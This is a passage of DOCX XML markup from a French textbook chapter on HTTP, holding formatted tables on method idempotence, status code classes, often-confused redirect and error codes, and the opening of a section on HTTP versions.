        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Ligne de statut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Code et raison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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20 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>57.2 Méthodes et idempotence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La méthode décrit l'intention. Certaines sont sûres (sans effet de bord), d'autres idempotentes (rejouables sans effet supplémentaire).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.199 — Six méthodes et leurs garanties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206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Méthode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Sûre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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Idempotente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Corps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2069"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2217"/>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2512"/>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2217"/>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="206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HEAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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251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221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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2069"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2217"/>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2512"/>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2217"/>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="206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PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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251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221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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2069"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2217"/>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2512"/>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2217"/>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="206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DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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251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221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Parfois</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IDEMPOTENCE HTTP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Propriété d'une requête qui, répétée à l'identique, laisse le serveur dans le même état. Un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> répété écrit la même ressource ; un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> répété crée deux ressources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>57.3 Codes de statut</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.200 — Cinq classes de codes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162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Classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="443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Exemples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1626"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4433"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>100 Continue</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>101 Switching Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="162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2xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Succès</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4433"/>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200</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>201</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>204</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>206</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1626"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>3xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Redirection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4433"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>301</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>302</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>304</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>307</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>308</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="162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4xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Erreur du client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4433"/>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400</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>401</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>409</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>422</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>429</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1626"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>5xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreur du serveur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4433"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>500</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>502</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>503</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>504</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq codes souvent confondus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302 Found            redirection temporaire (méthode parfois changée)</w:t>
        <w:br/>
        <w:t>307 Temporary Redirect  redirection temporaire, méthode préservée</w:t>
        <w:br/>
        <w:t>301 Moved Permanently   redirection permanente (cache long)</w:t>
        <w:br/>
        <w:t>308 Permanent Redirect  idem, méthode préservée</w:t>
        <w:br/>
        <w:br/>
        <w:t>304 Not Modified      le cache est encore valide</w:t>
        <w:br/>
        <w:t>429 Too Many Requests en-tête Retry-After attendu</w:t>
        <w:br/>
        <w:t>503 Service Unavailable  surcharge ou maintenance planifiée</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`301` EST MIS EN CACHE POUR LONGTEMPS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>301</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> mal placé reste dans les navigateurs et les caches intermédiaires pendant des mois. Pour un changement réversible, préférez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>302</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>307</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>57.4 Les trois versions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque version répond à une limite de la précédente : le nombre de connexions, le blocage en tête de ligne, puis la latence d'établissement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.201 — Trois versions et leurs limites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172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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="209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Transport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
